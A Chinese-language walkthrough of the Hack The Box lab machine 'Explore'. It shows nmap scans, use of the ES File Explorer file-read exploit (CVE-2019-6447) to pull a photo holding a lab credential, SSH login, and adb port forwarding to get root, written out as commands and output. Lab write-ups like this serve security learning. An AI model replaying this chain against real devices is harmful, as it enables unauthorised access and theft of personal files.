免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(root💀kali)-[~/htb/Explore]
└─# nmap -p- 10.10.10.247 --open
Starting Nmap 7.92 (https://nmap.org) at 2022-01-25 00:43 EST
Nmap scan report for 10.10.10.247
Host is up (0.25s latency).
Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
38185/tcp open unknown
42135/tcp open unknown
59777/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 89.34 seconds
┌──(root💀kali)-[~/htb/Explore]
└─# nmap -sV -Pn 10.10.10.247 -p 2222,38185,42135,59777 1 ⨯
Starting Nmap 7.92 (https://nmap.org) at 2022-01-25 00:47 EST
Nmap scan report for 10.10.10.247
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
38185/tcp open unknown
42135/tcp open http ES File Explorer Name Response httpd
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
任意文件读取
搜寻 42135 端口服务破绽,存在一个任意文件读取破绽
┌──(root💀kali)-[~/htb/Explore]
└─# searchsploit ES File Explorer
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
ES File Explorer 4.1.9.7.4 - Arbitrary File Read | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure | windows/remote/20488.txt
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC) | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.C | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cros | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries Fo | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027) | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection | php/webapps/35851.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
拷贝到当前目录
┌──(root💀kali)-[~/htb/Explore]
└─# searchsploit -m android/remote/50070.py
Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
URL: https://www.exploit-db.com/exploits/50070
Path: /usr/share/exploitdb/exploits/android/remote/50070.py
File Type: Python script, ASCII text executable
Copied to: /root/htb/Explore/50070.py
查看 exp 反对命令
┌──(root💀kali)-[~/htb/Explore]
└─# python3 50070.py id 10.10.10.247 1 ⨯
[-] WRONG COMMAND!
Available commands :
listFiles : List all Files.
listPics : List all Pictures.
listVideos : List all videos.
listAudios : List all audios.
listApps : List Applications installed.
listAppsSystem : List System apps.
listAppsPhone : List Communication related apps.
listAppsSdcard : List apps on the SDCard.
listAppsAll : List all Application.
getFile : Download a file.
getDeviceInfo : Get device info.
查看指标零碎中所有照片
┌──(root💀kali)-[~/htb/Explore]
└─# python3 50070.py listPics 10.10.10.247
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
发现一个叫 creds.jpg 的照片,下载到本地
┌──(root💀kali)-[~/htb/Explore]
└─# python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
[+] Downloading file...
[+] Done. Saved as `out.dat`.
转成 jpg
┌──(root💀kali)-[~/htb/Explore]
└─# mv out.dat creds.jpg
发现了一个用户凭据:
kristi:Kr1sT!5h@Rp3xPl0r3!
foodhold
登录到零碎,拿到 foothold
┌──(root💀kali)-[~/htb/Explore]
└─# ssh kristi@10.10.10.247 -p 2222 255 ⨯
Password authentication
(kristi@10.10.10.247) Password:
:/ $ whoami
u0_a76
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
查看零碎信息,是一台安卓机器
:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64
在 sdcard 找到 user.txt
:/sdcard $ ls
Alarms DCIM Movies Notifications Podcasts backups user.txt
Android Download Music Pictures Ringtones dianxinos
:/sdcard $ cat user.txt
f32017174......
:/sdcard $ pwd
/sdcard
提权
adb
什么是 adb?
ndroid 调试桥 (adb) 是一种性能多样的命令行工具,可让您与设施进行通信。adb 命令可用于执行各种设施操作(例如装置和调试利用),并提供对 Unix shell(可用来在设施上运行各种命令)的拜访权限。它是一种客户端 - 服务器程序,包含以下三个组件:
客户端:用于发送命令。客户端在开发机器上运行。您能够通过收回 adb 命令从命令行终端调用客户端。
守护程序 (adbd):用于在设施上运行命令。守护程序在每个设施上作为后盾过程运行。
服务器:用于治理客户端与守护程序之间的通信。服务器在开发机器上作为后盾过程运行。
简略来说就是电脑连贯安卓的一个 shell,个别运行在 5555 端口,然而这台靶机并没有对外开放这个端口
用 ssh 做一个转发服务 ssh kristi@10.10.10.247 -L 5555:localhost:5555 -p 2222
kali 端连贯本地 5555 端口
┌──(root💀kali)-[~/htb/Explore]
└─# adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555
列出连贯的设施
┌──(root💀kali)-[~/htb/Explore]
└─# adb devices 1 ⨯
List of devices attached
emulator-5554 device
localhost:5555 device
切换成 shell,再用 su 提权到 root
┌──(root💀kali)-[~/htb/Explore]
└─# adb -s localhost shell 1 ⨯
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ whoami
shell
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # whoami
root
:/ # cat /data/root.txt
f04fc82b....